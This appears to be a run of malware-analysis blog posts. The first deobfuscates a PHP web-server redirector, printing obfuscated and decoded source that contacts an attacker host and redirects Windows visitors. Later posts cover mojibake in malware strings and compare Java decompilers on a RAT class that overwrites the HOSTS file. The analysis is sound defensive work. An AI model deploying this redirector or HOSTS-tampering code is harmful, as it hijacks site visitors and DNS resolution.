6),ROOT._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND$GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo_1348942592(10);}else{echo_1348942592(11);}}else{echo_1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND$_GET[_1348942592(14)]==_1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)]._1348942592(17));echo$_1;exit;}if(isset($_GET[_1348942592(18)])AND$_GET[_1348942592(19)]==_1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)]._1348942592(22))){echo_1348942592(23);}else{echo_1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30).$GLOBALS['_584730172_'][15](_1348942592(31),$_2)._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34).$GLOBALS['_584730172_'][17](_1348942592(35),$_3)._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)]._1348942592(39));if($_4==_1348942592(40)or$_4==false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)]._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!=_1348942592(57))$_11=_1348942592(58).$_11._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60));?>

As a fan of obfuscation, this clearly piqued my interest. The initial question was what was contained within all of the Base64 sections, but let's examine this holistically.  At a high level view, there are three distinct sections to this code block, with the beginning of each underlined in the code above. Each can also be identified as beginning with "<?".




The "<? $GLOBALS['_584730172_']" section creates an array of multiple Base64-encoded function values. As each item is called by the code, base64_decode will run on its value and return actual text. By hand picking a few of these to test, they all return known PHP function names:
base64_decode('ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n') resolves to "error_reporting"
base64_decode('c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'=') resolves to "set_time_limit"
The actual Base64 encoded values are further obfuscated by breaking up the string into multiple segments and rejoining them with the PHP ".". As many stateful inspection devices may block PHP that contains a call of "preg_match", bad guys will normally Base64 encode it. But, devices can also search for the Base64 values of bad calls. So, to avoid this, the obfuscator code (not seen here) will randomly break up the text into chunks that are difficult for an automated device to piece back together.

Knowing that the "$GLOBALS['_584730172_']" resolves function names, we can analyze it in code with context. "$GLOBALS['_584730172_'][0]" will extract the first function name from the array ("error_reporting") and execute it in-place. We know that we need to just replace these calls with their actual Base64 decoded values. This can be done manually, but we'll do it automatically later.

The second section of the code is a function:
<?function_1348942592($i){

This function is doing the same thing as the "$GLOBALS['_584730172_']", but in a different manner. When passed a number, the function finds its corresponding value in an array and Base64 decodes it. When looking through these we see that they're the string values associataed with the code:
'aHR0cDovL2dheWxlZWNoZXIuY29tOjgx'resolves to "http://gayleecher.com:81"
'cXdlMTIz'resolves to "qwe123"

We see these strings substituted within the code as function calls like:
$_0=_1348942592(0);

Just as with the function names, we'll want to replace these calls with their respective strings in the code. 

And, finally, that leaves us with the actual code itself. By itself, it's not possible to analyze this without the function names and strings. You could manually replace the calls with the appropriate values, but it could also be done automatically. While in a hotel for an incident response, and waiting for my colleagues to prepare for dinner, I whipped up a very ugly decoder in Python. I've taken the time to clean it up a bit, shown below:

importbase64
script="""
<<script>>
"""

functions=[]
strings=[]

# Split the script into its three segments (functions, strings, code).
sections=script.split("<?")
function_section=sections[1]
string_section=sections[2]
code="<?"+sections[3]

# Parse through each value, separated by base64_decode call.
forentryinfunction_section.split("base64_decode"):
# Skip the initial entry as it contains no value.
if"GLOBALS"inentry:
continue
# Remove the string concatenations
entry=entry.replace("' .'","")
# Split on single quote to get the Base64 value contained within the quotes.
function=entry.split("'")[1]
# Append new function mame into array
functions.append(base64.b64decode(function))

forentryinstring_section.split(","):
entry=entry.split("'")[1]
strings.append(base64.b64decode(entry))

# Now start replacing function calls with true values. We split on the call to
# acquire each index number, then replace.
code_lines=code.split("$GLOBALS['_584730172_']")
forline_numinrange(1,len(code_lines)):
line=code_lines[line_num]
# Ensure the index call, [x], is in the string before going on.
ifnot"["inline:
continue
# Extract the index number, pull the function from the array.
codenum=line.split("[")[1].split("]")[0]
func=functions[int(codenum)]
# Recreate the array string and replace it in the code.
s="$GLOBALS['_584730172_'][%s]"%codenum
code=code.replace(s,func)

# Now start replacing strings with true values.
code_lines=code.split("_1348942592")
forline_numinrange(1,len(code_lines)):
line=code_lines[line_num]
ifnot"("inline:
continue
codenum=line.split("(")[1].split(")")[0]
string=strings[int(codenum)]
s="_1348942592(%s)"%codenum
code=code.replace(s,"'"+string+"'")

# Print the final code.
printcode

The resulting code has another slight level of obfuscation: no carriage returns or spacing. This is easily resolved by submitting the code to an online code cleaner, such as PHP Code Cleaner. This results in the original code which is much easier to analyze:


<?php
error_reporting(round(0));
set_time_limit(round(0));
$_0='http://gayleecher.com:81';

if(isset($_GET['qwe123'])AND$_GET['qwe123']=='123qwe'){
define('ROOT',dirname(__FILE__).'/');
define('LOG',ROOT.'ololo.txt');
@unlink(LOG);

if(!file_exists(LOG)){
@touch(LOG);

if(is_writable(LOG)ANDtrim(file_get_contents($_0.'/iframe.txt'))=='test'){
@unlink(LOG);
echo'work';
}else{
echo'NO WORK, NOT GET URL';
}
}
else{
echo'NO WORK, NOT WRITIBLE';
}
exit;
}

if(isset($_GET['aaa'])AND$_GET['aaa']=='aaa'){
$_1=file_get_contents($_SERVER['SCRIPT_FILENAME'].'.count');
echo$_1;
exit;
}

if(isset($_GET['bbb'])AND$_GET['bbb']=='ccc'){
if(unlink($_SERVER['SCRIPT_FILENAME'].'.count')){
echo'Null count ok';
}else{
echo'ERROR null count((';
}
exit;
}


if(!empty($_SERVER['HTTP_USER_AGENT'])){
$_2=array('MSIE','Firefox','Opera');
$_3=array('Windows');

if(preg_match('/'.implode('|',$_2).'/i',$_SERVER['HTTP_USER_AGENT'])){
if(preg_match('/'.implode('|',$_3).'/i',$_SERVER['HTTP_USER_AGENT'])){
$_4=@file_get_contents($_SERVER['SCRIPT_FILENAME'].'.count');
if($_4==''or$_4==false)$_4=round(0);
$_5=@fopen($_SERVER['SCRIPT_FILENAME'].'.count','w');
@flock($_5,LOCK_EX);
@fputs($_5,$_4+round(0+1));
@flock($_5,LOCK_UN);
@fclose($_5);
$_6=$_0.'/iframe2.txt';
$_7=round(0+300);
$_8='http://ya.ru/';

if (!$_6) exit();
$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) :array('last'=>round(0),'url'=>$_8);

if($_9['last']<time()-$_7){
if($_9['url']=file_get_contents($_6)){
$_9['last']=time();
$_10=fopen('settings.json','w');
flock($_10,LOCK_EX);
fputs($_10,serialize($_9));
flock($_10,LOCK_UN);
fclose($_10);
}
}
$_11 = $_9['url'] ? $_9['url'] : $_8;
if(substr($_11,round(0),round(0+1+1+1+1))!='http')$_11='http://'.$_11.'/';
header("Location: $_11");
exit;
}
}
}
header('HTTP/1.1 404 Not Found');
?>

Let's walk through this a bit. The code has multiple paths, depending on various inputs. These inputs are passed along as URI values

if(isset($_GET['qwe123'])AND$_GET['qwe123']=='123qwe'){

This line is responsible for checking for a URI field named "qwe123", such as:

http://www.website.com/a.php?qwe123=123qwe

If that field contains the value "123qwe", then this section of code is executed. This section looks for a file named "ololo.txt" in the same directory as the malicious code and, if found, deletes it (unlink()). If this doesn't work, it displays "NO WORK, NOT WRITABLE" in the web session. This file exists solely for the code to determine if it has write permissions to the folder via the web. It also ensures that it can browse to the malicious domain by retrieving hxxp://gayleecher.com:81/iframe.txt and ensuring that this file contains the text "test".

if(isset($_GET['aaa'])AND$_GET['aaa']=='aaa'){

This line checks for a URI field named "aaa" and ensures it contains the value of "aaa". If so, it will retrieve the code's current file name, append ".count" to the end of the name, and determine if that file exists in the current web folder. For example, a.php would look for a.php.count. If it exists, the contents will be displayed in the web session.

if(isset($_GET['bbb'])AND$_GET['bbb']=='ccc'){

This line checks for a URI field named "bbb" and ensures it contains the value of "ccc". If so, it will locate the aforementioned .count file and delete it.

Lacking any submitted values, the code performs its default routine. This begins by using ensuring that the visitor is using a Windows-based machine running Internet Explorer, Firefox, or Opera based upon the browser's user-agent. The code then updates its ".count" file to increment the counter by one. A request is then made to retrieve the contents of hxxp://gayleecher.com:81/iframe2.txt. This file currently contains:

http://s2s2s2.in/?id=123

Afterward is a line that would confuse many not familiar with ternary logic commands:

$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) :array('last'=>round(0),'url'=>$_8);

A ternary operation checks a logical condition to see if it is true or false. If true, it returns one set data; if false, another.

result = condition ? result_true : result_false

In this case, does the file "settings.json" exist? If so, then read the contents through unserialize() (which takes raw data and forms it into logical arrays) and place the resulting arrays into $_9. If "settings.json" does not exist, then create a new array with a "url" field that contains $_8 ("http://ya.ru").

The "url" field in this array is then set to the contents of the iframe2.txt file above, and the "last" field set to the current date and time as an epoch value. The values are then written to "settings.json".

Another aspect of this is the time frequency of connections. This can be determined by examining the following lines:
$_7=round(0+300);
if($_9['last']<time()-$_7){

This code sets $_7 to "300", with the "round(0" as cruft code that can be ignored. The same then checks to see if the "last" visit time is less than the current time (as an epoch) minus 300 seconds, or 5 minutes. In essence, if it's been longer than 5 minutes since checking in with iframe2.txt, the sample will check in to acquire the latest URL to connect to.

Later logic ensures that there is a URL set. If not, it will default to the hardcoded address of "http://ya.ru". For additional checking, the sample then ensures that the sample begins with the text "http". If not, it prepends it to create a valid URL:

if(substr($_11,round(0),round(0+1+1+1+1))!='http')$_11='http://'.$_11.'/';

The point to this entire script comes at the very end:

header("Location: $_11");

This is a slightly obscure PHP call that appends a raw HTTP header field to the outgoing response. In this case, it adds a "Location: " field used to redirect the client to a new web site.

So let's sit back and take in what we know.

This is an obfuscated PHP code that sits on a web server. When visited by a home user, the code will query gayleecher.com to retrieve a redirect URL. It saves this to a local file named "settings.json" and then redirects the home user to the same URL. All the while, a counter is being saved in the background that logs how many total home users are redirected. The actor can query this information by passing certain arguments to see how many total users were redirected.

At this time, all users are redirected to:

http://s2s2s2.in/?id=123

I hope this was insightful to anyone learning web attack analysis. I am a big fan of obfuscation, encoding, and encryption and love to tear apart such samples. As I've joked about, this is like Sudoku as a relaxing yet challenging exercise that more people should learn :)

Mojibaked Malware: Reading Strings Like Tarot Cards

$
0
0
One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to represent each character. The world has yet to recover from the shock of this great invention and modern programmers cry themselves to sleep while fighting with Unicode strings.

For a malware analyst, this typically comes about while analyzing code that's beyond the standard trojan, which typically contains no output. Analyzing C2 clients (servers in other contexts) and decoy documents require being able to identify the correct code page for strings so that they appear correctly, can be attributed to a language, and can then be translated.

ASCII is the range of bytes from 0-255, which occupy one byte of storage. UTF-8 extends upon this by using single-byte where possible, but also allowing variable-length bytes that are mathematically calculated to determine the correct byte to use. If you see a string of text that looks like ASCII, but then randomly contains unknown characters, it is likely UTF-8, such as:

C:\users\brian\樿鱼\malware.pdb

Code pages, UTF-16, and even UTF-32, provide additional challenges by providing little context to the data involved. However, I hope that by this point in 2013 we don't need to continually harp on what Unicode is...

For most analysts, their exposure to Unicode is being confronted with unknown text, and then trying to figure out how to get it back into its original language. This text, when illegible, is known as mojibake, a Japanese term for "writing that changes". The data is correct, and it does mean something to someone, but the wrong encoding is being applied. This results in text that looks, well... wrong.

Most analysts have gotten into the habit of searching for unknown characters then guessing which code page or encoding to apply until they produce something that looks legible. This does eventually work, but is a clumsy science. We all have our favorites to try: GB2312, Big5, Cyrillic, 8859-2, etc. But, let's just keep this short and sweet and show you a tool that your peers likely already know about but forgot to show you.



When dealing with direct strings, such as:

C:\users\brian\樿鱼\malware.pdb

That small section of unknown data in the middle is mojibake. The problem you'll find is that if this string of text is stored within a binary file, such as an executable, using a tool like 'strings' will miss it. 'strings' will instead return two strings: "C:\users\brian\" and "malware.pdb", completely missing the folder name that's UTF-8 Chinese. 

My preferred method for dealing with these is to simply paste the string into Notepad++. It can natively translate to UTF-8 or various code pages on the fly. Just make sure that you're in ANSI mode when you paste it in.

For graphical applications it's a bit more difficult. Take, for instance, these series of texts from a malware C2 client:


This is mojibake. The standard way that most people get around this issue is to identify the code page from the application, usually be using an application like ExifTool, setting their system to use that language pack as the primary, then rebooting and running the application again. This works, but is cumbersome. Others take VM snapshots of their analysis system in various languages, then just revert to the appropriate language to extract the language strings as needed.

The problem deepens when an application has a mixture of correct strings alongside mojibake strings, such as this program does:


The proper strings are the result of the program containing a String/Dialog resource with appropriate language settings applied. This program, viewed with Cerbero's PEInsider, showed Menus and Dialogs with proper settings applied (2052 - Chinese Simplified):


However, for its string table, the application feature virtually no entries at all. Just a string of "A" and "B".



This provides part of the picture, but doesn't encompass all of the strings we may run across, especially for those created dynamically at runtime.

The preferred way is to use a little-known, but also widely-known, Microsoft tool named AppLocale. AppLocale will run an application in a specific, chosen code page and provide native translation. All that is required is for you to have the appropriate language pack installed, without having to make it the OS's primary language.

However, there are multiple issues with AppLocale. It's a GUI loader that displays the supported languages in their native written format, as shown below, making it impossible to know which is which unless you already know the language.


Good luck with that. Especially when you jump between eight languages in a given week.

AppLocale does allow for command line execution, but requires you to know a specific four-digit code page number. A number that's based on Microsoft's Locale ID that's relatively unknown to outsiders. For instance, with Simplified Chinese, they use Locale ID 0804 instead of the universally known 2052.

To simplify the process, I threw together a quick script over the weekend that provided the full selection of Locale IDs, from which one is selected. It then creates a new option on the right-click context menu for executable files. That's it, nothing major.

The effect is instantaneous though. Edit the script and uncomment the language of your choice, then run the script as an account with administrative access. From there, you can simply right click on any executable and select "Execute with AppLocale". The applications should then show up in their native language without any reboots, like our text below from the earlier C2 client:


Note: If instead of the program running, AppLocale gives you a setup window, then you likely do not have that specified language pack installed.

Software:
Microsoft AppLocale: http://www.microsoft.com/en-us/download/details.aspx?id=13209
RightClick_AppLocale: https://github.com/Rurik/RightClick_AppLocale/blob/master/RCAppLocale.py



Further Fun Reading:
Do You want Coffee with That Mojibakehttp://iphone.sys-con.com/node/44480
Unicode Search of Dirty Data, Or: How I Learned to Stop Worrying and Love Unicode Technical Standard #18  Slide Deck (PDF)  |  White Paper
Russian Post Office fixes mojibake on the flyhttp://en.wikipedia.org/wiki/File:Letter_to_Russia_with_krokozyabry.jpg

Malware Analysis: The State of Java Reversing Tools

$
0
0
In the world of incident response and malware analysis, Java has always been a known constant. While many malware analysts are monitoring more complex malware applications in various languages, Java is still the language of love for drive-by attacks on common end-users. It is usually with certainty that any home user infection with malware such as Zeus, Citadel, Carberp, or ZeroAccess originated through a Java vulnerability and exploit. In typical crimeware (banking/financial theft malware) incidents, one group specializes on the backend malware (e.g. Zeus) while outsourcing the infection and entrenchment to a second group that creates exploit software like BlackHole, Neosploit, and Fiesta.

In many incident responses, I've seen analysts gloss over the Java infection vector as just an end-note. Once they see the final-stage malware on the system they write off the Java component as just a downloader without any real analysis. This creates issues for the times when the Java exploit only partially succeeds resulting in malicious Java JAR files on a system but no Trojan or malware.

Why did it fail? Was the system properly patched to prevent a full infection? Was there a permission setting that stopped the downloader in its tracks? These are the questions that typically force an analyst to begin analyzing Java malware.

I've discussed Java quite a bit on this blog in the past. My Java IDX cache file parser was made for the purpose of identifying files downloaded via Java, be them Windows executables or additional Java JAR files. In that same post I analyzed Java from a Fiesta exploit kit that installed a ZeroAccess trojan onto an analyzed system.

Though Java is not my forte, I've had to face it enough to find that there are many weaknesses and gaps in the tools used for analysis. What I found is that most analysts have been using the same, outdated tools in every case. If the tool fails, they just move on and don't finish their analysis. All the while, new applications are being released that are worthy of note. I felt it worthy to do an annual check-up of the state of analysis tools to display what is available and what weaknesses each holds. There have been similar efforts by others in the past, with the most recent I've found being one in 2010 on CoffeeBreaks, by Jerome.


This post was intended to be much larger and in-depth, delving into how each analysis tool manages decompilation and why they fail, but due to time and resources it was cut short.

The Setup

For this comparison I will be using code from a Java RAT that is in active development. Due to this active development, I will not name the RAT nor provide any files for download.

The malware used is obfuscated by a well-known Java obfuscation tool named Zelix KlassMaster (ZKM). ZKM has been discussed widely in the industry for years and I gave a presentation on how to identify and reverse its string encryption at a NoVA Hackers! (NoVAH!) meeting in May of 2012.

Due to this obfuscation we will be matrixing the results into decompilers match with two well known Java deobfuscators: JMD and JDO.

As it seems to be common with all Java analysis tools, many discussed here are no longer in development and have been left abandoned. However, in many cases, they still work for a majority of malicious samples.

Deobfuscators:
Deobfuscators work by detecting known obfuscation methods, such as renaming variables, classes, and functions, as well as basic string encoding. While many of these are methods are specific to known obfuscators, generic deobfuscation can be performed by searching for a routine that runs against encoded strings, then calling that routine externally against the strings.

JMDis one open-source deobfuscator, written in Java, but also available as a .NET 2.0 (64-bit d/l) executable. It runs directly against a JAR file and produces a deubfuscated JAR as a result. It provides the following deobfuscation methods:
  • Allatori
  • DashO
  • Generic string encoding
  • JShrink
  • SmokeScreen
  • Zelix KlassMaster (ZKM)

JDO(Java DeObfuscator) is open-source Java, as well, and is provided as a .NET 2.0 executable. Unlike JMD, it will only operate against a Java Class file. This will require you to manually unzip a JAR file, then run JDO against each individual Class file. It will attempt to automatically detect and deobfuscate data through generic means.

Decompilers:
JD-GUI is probably the most widely used decompiler. It features a well-thought out GUI as well as the ability to parse entire JAR files. However, its current hosting site is unavailable, though the site is mirrored elsewhere. For updates, refer to the Twitter page of Emmanuel Dupuy.

The various forms of JD-GUI
For the purpose of this post, the latest version of JD-GUI was used. However, this version may be lacking the functionality of over versions of "JD". Recently, a greater deal of development has been performed by the JD-GUI developer on JD-Core / JD-IntelliJ.

JAD is a free decompiler, though one that has been discontinued for many years, and as such has many problems with newer iterations of the Java Development Kit (JDK). It's original web domain is gone, and the project is now hosted elsewhere. It's a basic, command-line tool that has been used as the backend to multiple other Java decompilers.

FernFlower was a free decompiler that appeared around 2009 and was unique for being a web-based decompiler. In 2011, an offline JAR file was made available, and the website taken down shortly after. It's currently used as the backend to many commercial decompilers, such as AndroChef and DJ Java Decompiler. Notably, it's currently available bundled in with the Minecraft Coder Pack.

Procyon is a recently released, open-source decompiler. It is currently in active development and, while a command-line tool, does have two GUI front-ends available: Luyten and SecureTeam's Decompiler. Procyon is available on Bitbucket.

Other decompilers that were not included in the scope of this post:
CFR
JReversePro
Krakatau - Python-based decompiler

Disassemblers:
As reversers know, decompilation is an immature science. Certain liberties are taken to assume and guess what code is doing in order to make readable source. The most accurate method is to simply view the raw data itself as compiled Java bytecode. For those situations, reJ provides an excellent GUI front end, and the ability to modify code on-the-fly.

Eclipse plugins
Some decompilers have the Eclipse IDE plugins available. Eclipse IDE is currently the prominent environment for Java development, and such plugins allow for code to be reversed directly into a new project for debugging and analysis.


Test 1: Simple file writing function.

The first test will be against an obfuscated class function that allows the RAT to save network-transmitted data to the local Windows HOSTS file to override DNS resolutions.

JD-GUI (raw class file)

importjava.io.FileWriter;

publicclassecextendsu
{
privatestaticfinalString[]z;

publicvoidb(StringparamString)
{
inti=c.db;Stringstr=s.b();
try{if(i!=0)breaklabel140;if(b.a()!=b.f)breaklabel128;}catch(ExceptionlocalException2){throwlocalException2;}
try{
FileWriterlocalFileWriter=newFileWriter(System.getenv(z[4])+z[2]);
localFileWriter.write(str);
localFileWriter.close();
s.b(z[1]);
s.b("");}catch(ExceptionlocalException1){
}try{
s.b(z[1]);
s.b(z[3]+localException1.getMessage());

if(i==0)return;
label128:s.b(z[1]);}catch(ExceptionlocalException3){throwlocalException3;}
label140:s.b(z[0]);
}

From this analysis, we have little to work off of. We see the java.io.FileWriter class in use, so we know that file activity is taking place, but all strings are replaced with array lookups of z[#]. Let's attempt this again after running the class file through an obfuscator.

JD-GUI (JDO Deobfuscated)

importjava.io.FileWriter;

publicclassClass_ecextendsu
{
privatestaticfinalString[]var_3a2;

publicvoidsub_3ed(StringparamString)
{
inti=c.db;Stringstr=s.b();
try{if(i!=0)breaklabel140;if(b.a()!=b.f)breaklabel128;}catch(ExceptionlocalException2){throwlocalException2;}
try{
FileWriterlocalFileWriter=newFileWriter(System.getenv(var_3a2[4])+var_3a2[2]);
localFileWriter.write(str);
localFileWriter.close();
s.b(var_3a2[1]);
s.b("");}catch(ExceptionlocalException1){
}try{
s.b(var_3a2[1]);
s.b(var_3a2[3]+localException1.getMessage());

if(i==0)return;
label128:s.b(var_3a2[1]);}catch(ExceptionlocalException3){throwlocalException3;}
label140:s.b(var_3a2[0]);
}

static
{
// Byte code:
// 0: iconst_5
// 1: anewarray 13 java/lang/String
// 4: dup
// 5: iconst_0
// 6: ldc 4
... Reduced for brevity ...
//   156: invokespecial 97 java/lang/String:<init> ([C)V
// 159: invokevirtual 100 java/lang/String:intern ()Ljava/lang/String;
// 162: swap
// 163: pop
// 164: swap
// 165: tableswitch default:+-152 -> 13, 0:+-143->22, 1:+-134->31, 2:+-125->40, 3:+-116->49
}
}

Well, that was awkward. JMD did attempt to rename the string array from 'z' to 'var_3a2', but its edits exposed ZKM's string decryption function. This function was unable to be decompiled by JD-GUI and appears as disassembled code. Oddly, this function was not seen by JD-GUI on the raw class file. But, nothing usable here. Similar results were found when using JDO with other decompilers, so further use in this post was stopped.

JD-GUI (JMD Deobfuscated)

importjava.io.FileWriter;

publicclassecextendsu
{
privatestaticfinalString[]z;

publicvoidb(Stringarg0)
{
Stringstr=s.b();
try{if(b.a()!=b.f)breaklabel111;}catch(ExceptionlocalException2){throwlocalException2;}
try{
FileWriterlocalFileWriter=newFileWriter(System.getenv("SystemDrive")+"\\Windows\\System32\\drivers\\etc\\hosts");
localFileWriter.write(str);
localFileWriter.close();
s.b("HOSTANSW");
s.b("");}catch(ExceptionlocalException1){
}try{
s.b("HOSTANSW");
s.b("ERR: "+localException1.getMessage());return;

label111:s.b("HOSTANSW");}catch(ExceptionlocalException3){throwlocalException3;}
s.b("Needs to be windows");
}
}

Well, our work here is done! Based on this display we see the Java code resolving the environment variable of SystemDrive (typically C:\Windows) and adding the hardcoded path to the HOSTS file. It writes a string that's returned from class 's' function 'b' (s.b()), a function responsible for network communications. The "HOSTANSW" strings are simply transmitted back to the C2, along with the "ERR: " message, if encountered.

In all, JD-GUI combined with JMD was able to give us a "full" analysis of this one class file. Let's try other decompilers.

Procyon (raw class file)

importjava.io.*;

publicclassecextendsu
{
privatestaticfinalString[]z;

publicvoidb(finalStrings){
finalintdb=c.db;
finalStringb=s.b();
Label_0140:{
Label_0128:{
try{
if(db!=0){
breakLabel_0140;
}
if(b.a()!=b.f){
breakLabel_0128;
}
}
catch(Exceptionex){
throwex;
}
try{
finalFileWriterfileWriter=newFileWriter(System.getenv(ec.z[4])+ec.z[2]);
fileWriter.write(b);
fileWriter.close();
s.b(ec.z[1]);
s.b("");
}
catch(ExceptionfileWriter){
s.b(ec.z[1]);
finalFileWriterfileWriter;
s.b(newStringBuilder(ec.z[3]).append(((Throwable)fileWriter).getMessage()).toString());
if(db==0){
return;
}
s.b(ec.z[1]);
s.b(ec.z[0]);
finalObjecto;
throwo;
}
}
}
}

static{
//
// This method could not be decompiled.
//
// Original Bytecode:
//
// 0: iconst_5
// 1: anewarray Ljava/lang/String;
// 4: dup
// 5: iconst_0
// 6: ldc "_8>f 1)4\" t},k u2,q"
... Reduced for brevity ...
//   165: tableswitch {
// 0: 22
// 1: 31
// 2: 40
// 3: 49
// default: 13
// }
// 196: return
//
// The error that occurred was:
//
// java.lang.IllegalStateException: Inconsistent stack size at #0053.
// at com.strobel.decompiler.ast.AstBuilder.performStackAnalysis(AstBuilder.java:1104)
... Reduced for brevity ...
thrownewIllegalStateException("An error occurred while decompiling this method.");
}
}

Interesting results there. Note that Procyon threw an exception at the end for an "Inconsistent stack size". Regardless, the code decompiled fine. It also recognized the ZKM string decryption routine but only provided the disassembled code for it. The decompiled code is almost identical to that provided by JD-GUI but is in a much more structured display. While JD-GUI attempts to group conditions together and compact the function borders ({}), Procyon gives a more formal output, albeit a larger one. Even its disassembled output is more structured, with liberal carriage returns.

Let's now run Procyon with a deobfuscated class file:

Procyon (JMD Deobfuscated)

importjava.io.*;

publicclassecextendsu
{
privatestaticfinalString[]z;

publicvoidb(finalStringarg0){
finalStringb=s.b();
Label_0111:{
try{
if(b.a()!=b.f){
breakLabel_0111;
}
}
catch(Exceptionex){
throwex;
}
try{
finalFileWriterfileWriter=newFileWriter(System.getenv("SystemDrive")+"\\Windows\\System32\\drivers\\etc\\hosts");
fileWriter.write(b);
fileWriter.close();
s.b("HOSTANSW");
s.b("");
return;
}
catch(ExceptionfileWriter){
s.b("HOSTANSW");
finalFileWriterfileWriter;
s.b("ERR: "+((Throwable)fileWriter).getMessage());
return;
}
try{
s.b("HOSTANSW");
}
catch(Exceptionex2){
throwex2;
}
}

s.b("Needs to be windows");
}
}

Similar to JD-GUI, we're able to get a clean decompiled analysis of the file. The two code produced between the two is nearly identical with the main difference being in the formal structure of the conditions.

JAD (raw class file)

JAD is commonly the backup to JD-GUI, but is a much outdated model for decompilation and disassembly. One of my favorite features about JAD, though, is that when it does fail to decompile, it's disassembly is a good mixture of the two. It disassembles, but attempts to put logic into the disassembly instead of just a blind dump like JD-GUI and Procyon:


importjava.io.FileWriter;

publicclassecextendsu
{

publicec()
{
}

publicvoidb(Strings1)
{
Strings2;
inti;
i=c.db;
s2=s.b();
try
{
label0:
{
if(i!=0)
breakMISSING_BLOCK_LABEL_140;
if(b.a()!=b.f)
breakMISSING_BLOCK_LABEL_128;
breaklabel0;
}
}
catch(Exception_ex){}
FileWriterfilewriter=newFileWriter((newStringBuilder(String.valueOf(System.getenv(z[4])))).append(z[2]).toString());
filewriter.write(s2);
filewriter.close();
s.b(z[1]);
s.b("");
breakMISSING_BLOCK_LABEL_148;
Exceptionexception;
exception;
s.b(z[1]);
s.b((newStringBuilder(z[3])).append(exception.getMessage()).toString());
if(i==0)
breakMISSING_BLOCK_LABEL_148;
s.b(z[1]);
breakMISSING_BLOCK_LABEL_140;
throw;
s.b(z[0]);
}

privatestaticfinalStringz[];

static
{
Stringas[]=newString[5];
as;
as;
0;
"_8>f\0071)4\"\026t},k\032u2,q";
-1;
goto_L1
_L7:
JVMINSTRaastore;
JVMINSTRdup;
true;
"Y\022\bV5_\016\f";
false;
goto_L1
_L8:
JVMINSTRaastore;
JVMINSTRdup;
2;
"M\n2l\020~*(^'h./g\031\"o\007f\006x+>p\007M8/a(y2(v\007";
true;
goto_L1
_L9:
JVMINSTRaastore;
JVMINSTRdup;
3;
"T\017\t8T";
2;
goto_L1
_L10:
JVMINSTRaastore;
JVMINSTRdup;
4;
"B$(v\021|\031)k\002t";
3;
goto_L1
... Reduced for brevity ...
JVMINSTRnew#13<ClassString>;
JVMINSTRdup_x1;
JVMINSTRswap;
String();
intern();
JVMINSTRswap;
JVMINSTRpop;
JVMINSTRswap;
JVMINSTRtableswitch03:default13
// 0 22
// 1 31
// 2 40
// 3 49;
goto_L7_L8_L9_L10_L11
}
}

JAD's decompiler does a fairly decent job, but differs on how it handles exception handling within the code. Let's see how it operates on deobfucated classes:

JAD (JMD Deobfuscated)


importjava.io.FileWriter;

publicclassecextendsu
{

publicec()
{
}

publicvoidb(Stringarg0)
{
Strings1;
s1=s.b();
try
{
label0:
{
if(b.a()!=b.f)
breakMISSING_BLOCK_LABEL_111;
breaklabel0;
}
}
catch(Exception_ex){}
FileWriterfilewriter=newFileWriter((newStringBuilder(String.valueOf(System.getenv("SystemDrive")))).append("\\Windows\\System32\\drivers\\etc\\hosts").toString());
filewriter.write(s1);
filewriter.close();
s.b("HOSTANSW");
s.b("");
breakMISSING_BLOCK_LABEL_129;
Exceptionexception;
exception;
s.b("HOSTANSW");
s.b((newStringBuilder("ERR: ")).append(exception.getMessage()).toString());
breakMISSING_BLOCK_LABEL_129;
s.b("HOSTANSW");
breakMISSING_BLOCK_LABEL_122;
throw;
s.b("Needs to be windows");
}

privatestaticfinalStringz[];

}

